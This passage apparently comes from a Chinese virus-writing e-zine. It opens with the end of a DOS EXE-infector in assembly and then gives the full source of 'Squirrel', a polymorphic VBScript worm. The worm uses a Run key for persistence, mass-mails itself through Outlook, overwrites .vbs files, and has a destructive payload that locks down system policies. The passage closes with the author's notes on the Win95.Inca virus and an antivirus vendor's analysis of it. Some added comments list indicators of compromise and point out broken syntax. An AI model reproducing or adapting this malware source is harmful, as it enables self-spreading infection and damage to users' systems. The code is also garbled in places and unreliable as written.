 XOR DX,DX
 INT 21H
 
 MOV AX,4200H                    ; seek to offset 2 (e_cblp / e_cp)
 XOR CX,CX
 MOV DX,02H
 INT 21H
 MOV DX,DS:[S_H]
 MOV AX,DS:[S_L]
 POP CX
 ADC AX,CX                       ; new size = old + padding + image
 JNC NC1                         ;   (ADC also adds whatever CF is at this point)
 INC DX
 NC1: ADC AX,OFFSET P_SIZE
 JNC NC2
 INC DX
 NC2: MOV CX,200H
 DIV CX                          ; -> pages (+1) and bytes in the last page
 INC AX
 MOV DS:[B_EXE],DX
 MOV DS:[H_EXE],AX
 MOV DX,OFFSET B_EXE
 MOV CX,4H
 MOV AH,40H
 INT 21H
 
 MOV AX,4200H
 XOR CX,CX
 MOV DX,14H                      ; write N_IP/N_CS into e_ip/e_cs
 INT 21H
 MOV AH,40H
 MOV CX,4H
 MOV DX,OFFSET N_IP
 INT 21H
 
 MOV AX,5701H                    ; restore the date, set time low byte = 77 (marker)
 MOV CH,DS:[T_H]
 MOV CL,77
 MOV DX,DS:[D]
 INT 21H
 
 MOV AH,3EH                      ; close
 INT 21H
 
 MOV DX,OFFSET FN
 MOV AX,4301H                    ; restore the original attributes from the DTA
 XOR CH,CH
 MOV CL,DS:[C]
 INT 21H
 RET
 
 GR ENDP
 ; DTA layout (DOS find-first/find-next record) used above:
 DTA DB 21 DUP(0)                ; reserved
 C DB 0                          ; attributes
 T_L DB 0                        ; time, low byte
 T_H DB 0                        ; time, high byte
 D DW 0                          ; date
 S_L DW 0                        ; size, low word
 S_H DW 0                        ; size, high word
 FN DB 13 DUP(0)                 ; ASCIIZ file name

 P_SIZE:                         ; end of image; also the MBR read buffer in BEGIN
 
 CSEG ENDS
 END START
;****************************************************************************
;* 此文件(CV2.ASM)可用MASM和LINK编译成可执行文件. *
;* 第一次运行时会造成死机.重新启动机器后,病毒已 *
;* 驻留内存. *
************************************************************************
下次我们的老大ATM将向大家介绍win9x/Me/NT/2000/xp virus (只是一只而已,不过很全的几乎包含了atm所有的病毒技术了)
下面是Squirrel 的一只新毒的测试版
' A VBScript worm. Every copy it writes is re-encoded with a freshly generated
' random key and random identifier names (see passaa/cont/exor/xortie), so no
' two copies are byte-identical ("multi-variant").

' ---- Top level (runs at load) --------------------------------------------
' NOTE(review): this script mixes VB6-only syntax (typed "Dim x As Long",
' multi-line string literals, typed Scripting.* objects, LOF / byte arrays)
' with VBScript, and registry/file paths are written with "/" (possibly a
' paste artifact). As published it would not execute under WSH; it is kept
' byte-for-byte here for analysis only. Nothing visible below calls main().
On Error Resume Next
dim wscr,rr,htmlvirus,vbss,file,fso,vbscopy,pass,conta,contb,vbscopya,dexorstring,psa,dexortie
Set fso = CreateObject("Scripting.FileSystemObject")
set wscr=CreateObject("WScript.Shell")
' Disable the WSH script timeout so long-running copies are not killed.
rr=wscr.RegRead("HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout",0,"REG_DWORD"
end if
' Read the running script's own source; this is the payload that gets re-encoded.
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
' dexorstring: decoder stub emitted into generated droppers (counterpart of
' exor()). Expects ps = key and ts = encoded text; reseeds Rnd from the key,
' XORs each character with Int(Rnd*256), then undoes the 6-bit packing
' (chars offset by 59) and leaves the result in vbscopy.
' (No comments may be placed inside the literal: they would become part of it.)
dexorstring="
Dim lngq As Long
 Randomize Rnd(-1)
 For lngq = 1 To Len(ps)
 Randomize Rnd(-Rnd * Asc(Mid(ps, lngq, 1)))
 Next lngq
Dim lngz As Long
 Dim ints As Long
 Dim lngx As Long
 For lngx = 1 To Len(ts)
 lngz = Asc(Mid(ts, lngx, 1))
 ints = Int(Rnd * 256)
 Mid(ts, lngx, 1) = Chr(lngz Xor ints)
 Next lngx
Dim lngC As Long
 Dim lngD As Long
 Dim lngE As Long
 Dim lngA As Long
 Dim lngB As Long
 Dim lngN As Long
 Dim lngJ As Long
 Dim lngK As Long
 Dim strB As String
 lngA = Len(ts)
 lngB = lngA - 1 - (lngA - 1) / 4
 strB = Space(lngB)
 For lngN = 1 To lngB
 lngJ = lngJ + 1
 lngC = Asc(Mid(ts, lngJ, 1)) - 59
 Select Case lngN Mod 3
 Case 1
 lngK = lngK + 4
 If lngK > lngA Then lngK = lngA
 lngE = Asc(Mid(ts, lngK, 1)) - 59
 lngD = ((lngE / 16) And 3) * 64
 Case 2
 lngD = ((lngE / 4) And 3) * 64
 Case 0
 lngD = (lngE And 3) * 64
 lngJ = lngJ + 1
 End Select
 Mid(strB, lngN, 1) = Chr(lngC Or lngD)
 Next lngN
 vbscopy = strB"
' dexortie: decoder stub for the xortie() variant: derives a numeric seed
' from the key (ps), seeds Rnd, and XORs every byte of ts with Int(Rnd*256).
dexortie="
dim k as long
dim length as integer
dim passc
length=len(ps)
for k=1 to 128
passc=ps+asc(mid(ps,k,1))*256*k
next k
passc=-passc
dim flength as long
dim size as long
dim byteblock() as byte
dim j as long
dim position as long
flength=lof(ts)
size=flength
rnd(passc)
byteblock=ts
for j=1 to size
byteblock(j)=byteblock(j) xor int(rnd*256)
next j
ts=byteblock"

 
' Entry point (not invoked by the visible top-level code).
' If the registry marker is not "die": drop an encoded copy, persist it,
' mass-mail it and spread to local .vbs files. Otherwise run killdatea().
sub main()
Dim known
Set known = CreateObject("WScript.shell")
If known.RegRead("HKEY_CURREN_USER/Squirrels2001", "vbs") <> "die" Then
passaa()            ' random key -> pass
cont()              ' random identifier names -> conta, contb
exor(pass)          ' vbscopy -> vbscopya (encoded)
dim c
' Dropper: %windir%/system32/Squirrel2001.vbs = decoder stub + encoded body.
' When run, it decodes itself into a randomly named .vbs under %windir% and
' executes that file.
set c=fso.createtextFile("%windir%"&"/system32/"&"Squirrel2001.vbs")
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&","&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexorstring
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'"&conta&contb&"'.vbs')"
c.close
set c=nothing
' Persistence: HKLM Run value "MSKernel32" pointing at the dropper (IOC).
known.regwirte "HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run/MSKernel32","%WINDIR%"&"/system32/Squirrel2001.vbs"
' Re-read the dropper: psa is what mailsend() embeds into outgoing mail.
set c=fso.opentextfile("%windir%"&"/system32/"&"Squirrel2001.vbs")
psa=c.readall
c.close
mailsend()
copyvirus()
else
killdatea()
end if
end sub

' Walks every drive of type 3 (fixed disk) and hands its root to virussafe(),
' then writes the "die" marker. Note the marker path here differs from the one
' main() reads, and `known` is local to main(), not in scope here.
sub copyvirus()
Dim objfso As New Scripting.FileSystemObject
Dim drvloop As Scripting.Drive
For Each drvloop In objfso.Drives
If drvloop.DriveType = Fixed Or drvloop.IsReady Then   ' `Fixed` is undeclared here
If drvloop.DriveType = 3 Then                          ' the real selection: fixed disks only
virussafe drvloop.driveletter&":/"
End If
End If
Next drvloop
Set objfso = Nothing
known.RegWrite("HKEY_CURREN_USER/Squirrel2001/vbs","die",REG_STRING)
end sub

' Recursive directory walk from strpath. Every file whose last four characters
' match the test below is handed to copyin(), which overwrites it with an
' encoded copy of the worm. (As written the upper-cased extension is compared
' with a lower-case literal.) Subfolders are visited recursively.
Sub virussafe(strpath As String)
Dim objfolder As Scripting.Folder
Dim objfile As Scripting.File
Dim objsubdirs As Scripting.Folders
Dim sobj As Scripting.FileSystemObject
Dim sobjv, c, fs
Dim a As String
Dim ca As Scripting.TextStream
Dim objloopfolder As Scripting.Folder
Set sobjv = CreateObject("Scripting.FileSystemObject")
Set sobj = New Scripting.FileSystemObject
Set objfolder = sobj.GetFolder(strpath)
For Each objfile In objfolder.Files
If UCase$(Right$(objfile.ShortPath, 4)) = ".vbs" Then
If objfile.Path <> Appliction.Name Then      ' skip (what is presumably meant to be) itself
copyin(objfile.fullpath)
End If
End If
Next objfile
Set objsubdirs = objfolder.SubFolders
For Each objloopfolder In objsubdirs
virussafe objloopfolder.Path
Next objloopfolder
Set objsubdirs = Nothing
Set objfolder = Nothing
End Sub

' Builds the per-copy encoding key in the global `pass`: a number derived from
' the current date/time followed by 33 characters drawn at random from usechar.
sub passaa()
pass=""
dim i,usechar,word
i=0
usechar="QWERTYUIOP{ }ASDFGHJKL:ZXCVBNM<>?~!@#$%^&*()_+|*/-qwertyuiop[]asdfghjkl;'zxcvbnm,./`1234567890-=/"
word=""
Randomize
for i=0 to 32
word=word+Mid(usechar,Le(usechar)*rnd+1,1)
next i
pass=(year(now)+800)*month(now)*day(now)*(time(now)+100)+word
end sub

' Generates the random identifier names used inside generated droppers:
' conta = 13 random upper-case letters; contb = random letters interleaved
' with characters of conta, then put through a numeric expression.
sub cont()
conta=""
contb=""
dim i,usechar,word
i=0
usechar="QWERTYUIOPASDFGHJKLZXCVBNM"
word=""
Randomize
for i=0 to 12
word=word+Mid(usechar,Le(usechar)*rnd+1,1)
next i
conta=word
dim kk
word=""
Randomize
for kk=0 to 12
word=word+mid(usechar,Le(usechar)*rnd+1,1)+mid(conta,Le(conta)*rnd+1,1)
next kk
contb=word*year(now)*256-1
end sub

' Encoder paired with the dexorstring stub. Step 1: seed Rnd from the key and
' XOR every character of vbscopy with Int(Rnd*256). Step 2: pack the result
' 6 bits per output character (each offset by 59), collecting the high two
' bits of every three input bytes into a fourth character. Result -> vbscopya.
' (The second loop is written "For lngN ... Next lngs" and indexes with lngs.)
sub exor(mstrKey as string)
vbscopya=""
Dim lngN As Long
 Randomize Rnd(-1)
 For lngN = 1 To Len(mstrKey)
 Randomize Rnd(-Rnd * Asc(Mid(mstrKey, lngN, 1)))
 Next lngN
Dim lngC As Long
 Dim intB As Long
 Dim lngx As Long
 For lngx = 1 To Len(vbscopy)
 lngC = Asc(Mid(vbscopy, lngx, 1))
 intB = Int(Rnd * 256)
 Mid(vbscopy, lngx, 1) = Chr(lngC Xor intB)
 Next lngx
Dim lngz As Long
 Dim lngs As Long
 Dim lngJ As Long
 Dim lngK As Long
 Dim lngA As Long
 Dim str As String
 lngA = Len(vbscopy)
 strB = Space(lngA + (lngA + 2) / 3)
 For lngN = 1 To lngA
 lngz = Asc(Mid(vbscopy, lngs, 1))
 lngJ = lngJ + 1
 Mid(strB, lngJ, 1) = Chr((lngz And 63) + 59)
 Select Case lngs Mod 3
 Case 1
 lngK = lngK Or ((lngz / 64) * 16)
 Case 2
 lngK = lngK Or ((lngz / 64) * 4)
 Case 0
 lngK = lngK Or (lngz / 64)
 lngJ = lngJ + 1
 Mid(strB, lngJ, 1) = Chr(lngK + 59)
 lngK = 0
 End Select
 Next lngs
 If lngA Mod 3 Then
 lngJ = lngJ + 1
 Mid(strB, lngJ, 1) = Chr(lngK + 59)
 End If
 vbscopya = strB
end sub

' Mass-mailer through Outlook MAPI automation. For each address list it
' compares the entry count with the count stored under
' HKCU\Software\Microsoft\WAB\<list>; for every address not yet recorded there
' it sends a message with Subject " Happy Valentine's Day To You" whose HTML
' body carries the dropper (psa) inside a <Script Language='VBScript'> tag,
' then records the address. IOCs: the WAB registry values, the subject line,
' and Outlook being driven from wscript.exe.
sub mailsend()
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
' Limitation: only Outlook is supported; Outlook Express is not.
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER/Software/Microsoft/WAB/"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = " Happy Valentine's Day To You"
male.HtmlBody ="<Script Language='VBScript'>"&psa&"</Script>"
male.Send
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

' Replaces the script at filea with one of four generated variants, chosen at
' random: (1) dropper built with exor()/dexorstring; (2) dropper built with
' xortie()/dexortie; (3) and (4) the same two, but the overwritten script's
' original text (cr) is also encoded and embedded, with a generated "sub main()"
' that decodes and runs it, so the victim script appears to keep working.
' (Calls passa(), whereas the defined routine is passaa().)
sub copyin(filea as string)
passa()
cont()
dim c,di,cr
set di=fso.opentextfile(filea)
cr=di.readall                       ' original content of the victim script
di.close
fso.deletefile(filea)
set c=fso.CreateTextFile(filea)
dim usechar,word
usechar="1234"
word=""
Randomize
word=Mid(usechar,Le(usechar)*rnd+1,1)
Select Case Val(word)
 Case 1
' Variant 1: exor-encoded dropper.
exor(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexorstring
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'"&conta&contb&"'.vbs')"
c.close
 Case 2
' Variant 2: xortie-encoded dropper.
xortie(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexortie
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'"&conta&contb&"'.vbs')"
c.close
 Case 3
' Variant 3: victim script encoded with xortie, worm body with exor.
dim vbscopyb
vbscopyb=vbscopy
vbscopy=cr
xortie(pass)
vbscopy=vbscopyb
vbscopyb=vbscopya
exor(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexortie
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'&conta&contb&'.vbs')"
c.write"sub main()"
c.write"ts="&vbscopyb
c.wirte dexorstring
c.write"dim dss"
c.write"set dss=ass.createtextfile("&conta*contb&"'.vbs')"
c.write"dss.write vbscopy"
c.write"dss.close"
c.write"shell("&conta*contb&"'.vbs')"
c.write"end sub"
c.close
 Case 4
' Variant 4: victim script encoded with exor, worm body with xortie.
dim vbscopyb
vbscopyb=vbscopy
vbscopy=cr
exor(pass)
vbscopy=vbscopyb
vbscopyb=vbscopya
xortie(pass)
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexorstring
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'&conta&contb&'.vbs')"
c.write"sub main()"
c.write"ts="&vbscopyb
c.wirte dexortie
c.write"dim dss"
c.write"set dss=ass.createtextfile("&conta*contb&"'.vbs')"
c.write"dss.write vbscopy"
c.write"dss.close"
c.write"shell("&conta*contb&"'.vbs')"
c.write"end sub"
c.close
End Select
end sub

' Second encoder, paired with the dexortie stub: derives a numeric seed from
' the key, seeds Rnd, and XORs every byte of vbscopy with Int(Rnd*256).
' Result -> vbscopya. Relies on VB6 semantics (LOF on a string, string-to-
' byte-array assignment) that VBScript does not provide.
sub xortie(passb as string)
vbscopya=""
dim k as long
dim length as integer
dim passc
length=len(passb)
for k=1 to 128
passc=passb+asc(mid(passb,k,1))*256*k
next k
passc=-passc
dim flength as long
dim size as long
dim byteblock() as byte
dim j as long
dim position as long
flength=lof(vbscopy)
size=flength
rnd(passc)
byteblock=vbscopy
for j=1 to size
byteblock(j)=byteblock(j) xor int(rnd*256)
next j
vbscopya=byteblock
end sub

' Payload run once the "die" marker exists: writes ~40 user-policy
' restrictions (Explorer, System, ActiveDesktop, Network) under
' HKCU\Software\Microsoft\Windows\CurrentVesion\Policies. Note the key name is
' spelled "CurrentVesion", which is not the path Windows evaluates. For IR,
' remove that key and check the real CurrentVersion\Policies tree as well.
sub killdatea()
On Error Resume Next
dim snow
set snow=CreateObject("WScript.Shell")
' Explorer shell restrictions: Run/Find/Log Off/Shut Down, Folder Options, context menus, ...
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoRecentDocsMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoFind",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoRun",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoLogOff",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoClose",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoSetFolders",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoFavoritesMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoStartBanner",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoSetTaskbar",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoFolderOptions",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoSetActiveDescktop",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoWindowsUpdate",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoViewContextMenu",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoTrayContextMenu",1,"REG_DWORD"
' System / Control Panel pages: Device Manager, display, passwords, profiles, ...
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDevMgrPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoConfigPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoFileSysPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoVirtMemPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispCPL",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispBackgroundPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispscrsavPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispAppearancePage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoDispSettingsPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoSecCPL",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoPwdPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoAdminPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/System/NoProfilePage",1,"REG_DWORD"
' Active Desktop and Network configuration restrictions.
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoAddingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoDeletingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoEditingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/ActiveDesktop/NoClosingComponents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoNetSetup",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoNetSetupIDPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoNetSetupSecurityPage",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoFileSharingControl",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoEntireNetwork",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Network/NoWorkgroupContents",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoPrinters",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoAddPrinter",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoDeletePrinter",1,"REG_DWORD"
snow.regwrite"HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVesion/Policies/Explorer/NoPrinterTab",1,"REG_DWORD"
snow.regwrite"HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeCaption","I MISS YOU"
snow.regwrite"HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeText","难道真是昨夜星辰昨夜风,此情可待成追忆了吗?一切都仿佛发生在昨天!你好吗?我只是想知道你还好吗。"
if month(now()) = 3 then
goto die
end if
:die
dim n
n=100000
goto fire
:trysnow
if n = 0 then
n=100000
goto fire
else
goto fire
end if
:fire
snow.popul"给我痴迷的叶子:
 别问我是谁,
 我知道你不会看见这封信,因为你说现在不上网了。所以我把要告诉你的话,
真心的话,都写在这里。也许,有一天你会看见它,而我已离去,不再回头。
我说如果要爱你,我会背负上道德的枷锁。你说,自己的事别人管不着。
喜欢就是喜欢而不喜欢也不能勉强。可是善良、热情和体贴的我,有着软弱、
轻信和呆板的一面,你看到了吗?我难以放下别人的眼光,追求我的真爱。
如果现在我已经为此付出了心痛的代价,我相信,将来这代价会越来越大!
曾经对你说,我的心已经是一片死地,寂静而荒凉;我已不能体会什么是
伤心和痛苦,因为泉眼里已经没有汩汩的泉水。而现在,我遇到你之后,才
发现自己犯了一个错误——死的已经死了,而活着的并没有消失。它躲了起来,
等待着春风的吹拂,期盼着雨露的滋润。虽然它什么都不说,而只是默默的等待。
这时我等到了你。或许是,你终于找到了我。我爱上了你的声音,然后是你的
善良和体贴。我内心的欢喜无法言说,却小心翼翼的将之掩藏。我好想告诉你真
的已经爱上了你,可是对着你,对着电话,我又故做冷淡和理智! 我把你的信
读了一遍又一遍,而告诉你只读了一次;我把你的声音回味了一次又一次,却不
敢让你知道我已经深陷情网;我看着你的成长,为你欣喜,却更收藏我的创伤,
一个人默默舔尝。 你能体会我的话,对吗?每一次你都说:我懂,你的每一句话
我都懂!你不知道,这句话让我多感动! 好想爱,不能爱。
 盼与你有来生缘!
 Love you for ever."
shell("%windir%/write.exe")
n=n-1
goto trysnow
end sub

下面是病毒赏析。今天我们要欣赏 Win95.Inca（据称是第一只 Win32 混合型病毒）。以下先是病毒作者的原始说明，再附 DrWeb 分析的英译文；文中列出的文件名（C:\W95INCA.COM、\WINDOWS\SYSTEM\FONO98.VXD、SYSTEM.INI 中的 device=fono98.vxd、INCA.EXE、SCRIPT.INI、REVENGE.COM）即可作为检测与清理时的特征。
 ;[W95.INCA] Multipartite PE/BOOT polymorphic mIRC spreading infector
;Copyright 1998 (c) Vecna
;
;This is my first attempt at w95 plataform. Is a multipartite infector of PE
;filez, focused in fast spreading. It infect PE files by adding a new section
;randomly named and a polymorphic VxD-dropper. It infect ARJ/ZIP/RAR/LHA/PAK
;by adding a random named COM dropper, encripted by a polymorphic loop. It
;infect boot of floppies by adding a polymorphic loader to their boot sectorz.
;It spread over internet using DCC protocol provided by mIRC, using a worm to
;spread over channelz. In the internet part is also the payload activation.
;
;The polymorphic decriptor in PE files isnt based in math instructionz, but
;in swapping. This novel technic of encription should provide problemz to
;disinfection and detection i hope, as not the whole code is "encripted" , but
;just some chunkz. The polymorphic decriptor is filled by lotz of conditionalz
;and unconditional jumpz.
;
;The polymorphic engine that generate the droppers and the boot loader keep
;track of the contentz of all regz and flagz, as in advanced engines as
;Uruguay or Level3. This mean that if i need AX holding 0x0202, as for load 2
;sectorz in the boot loader, i can obtain this values using XOR AX, ??? or
;ADD AX, ??? and like.
;
;This source isnt compilable as is. Use the pre-compiled virus.
;
;
;Here's the description of w95/Inca by DrWeb, translated from russian to
;english by Lurker (thankz!!)
;
;
;Win95. Inca
;
; Dangerous resident polymorphic multipartite virus. Win95.Inca
; infects EXE files in a format of PE (Portable Executable) for
; operation systems Windows95/98 and boot sectors of floppy
; disks. And also Win95.Inca is a virus-worm for ARJ, LHA, LZH,
; PAK, RAR and ZIP-archives and for the mIRC32 program.
;
; When infected PE file is started, the virus receives management
; and polymorphic decryptor deciphers the base code of a virus.
; And this decoding is made by enough unusual way - in initial variant
; the base virus code will contatin the table of indexes or displacements
; of original bytes in the virus body. And it is necessary to understand
; that decoding in this case will be substitution or compilation
; original bytes on place of their one-byte indexes or displacements.
; After given "assembly" of the code, virus determines (by
; "already standard" for this type of viruses algorithm) the address
; of the functions it needs in KERNEL32.DLL and creates
; the file C:\W95INCA.COM (the forward slashes in some copies of this
; text are an extraction artefact), into which it writes a polymorphic
; DOS COM dropper.
;
; This polymorphic 16bit DOS-code is already generated on infection of
; the PE EXE-file, and because of that any "additional efforts" for
; creation of a polymorphic copies on the given stage are not undertaken.
; Then the created file is closed.
; This dropper file is executed by the virus and then, after some delay,
; deleted. Further the virus returnes back management to the
; infected host PE-file.
; This is all actions, which carries out a virus code in the PE EXE-file.
; Therefore, it is possible to consider all infected PE EXE-files, as
; droppers.
;
; The C:\W95INCA.COM file, when executed by the virus, determines the Windows
; directory (WINDIR) and tries to create in the \WINDOWS\SYSTEM folder
; a file with the name FONO98.VXD.
; If this attempt is successful, the virus unpacks
